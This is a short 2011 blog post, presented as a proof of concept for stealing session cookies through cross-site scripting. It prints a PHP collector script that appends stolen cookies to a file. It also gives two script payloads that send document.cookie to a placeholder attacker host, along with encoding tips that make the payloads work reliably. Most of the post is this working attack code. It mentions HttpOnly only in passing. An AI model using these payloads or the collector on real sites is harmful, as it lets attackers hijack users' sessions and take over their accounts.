Monday, May 2, 2011

How to steal cookies via XSS

This is a proof of concept demonstrating the fundamentals of stealing cookies via XSS:

There are two parts:

1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.

Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php"

<?php
// Collector: append the "code" query parameter (the victim's document.cookie) to a file, one line per hit.
$fp = fopen("/tmp/tokens.txt", "a");   // "a" appends; the original used "w", which overwrote the file on every hit
fwrite($fp, $_GET['code'] . "\n");
fclose($fp);


As you can see, all the server code does is take the 'code' parameter from the GET request and write its value to a file.

Part 2:

In a server that is vulnerable to XSS, input the following malicious code:

<script>new Image().src='[malicious_host]/malicious.php?code='+document.cookie</script>

or

<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='+document.cookie+'">')</script>


Both payloads create an image whose source points at our malicious server. The victim's browser fetches that URL, which carries document.cookie in the GET parameter "code" that the server reads and writes to the file. Two encoding details matter in practice: if the payload is delivered through a URL parameter, the "+" in the concatenation must itself be percent-encoded as "%2B", otherwise the server decodes it as a space and the script breaks; and cookie values containing "&" or "+" should be wrapped in encodeURIComponent() before concatenation, or the collector receives a truncated or altered value. Note also that a cookie set with the HttpOnly flag is not exposed through document.cookie, so this technique does not capture it.
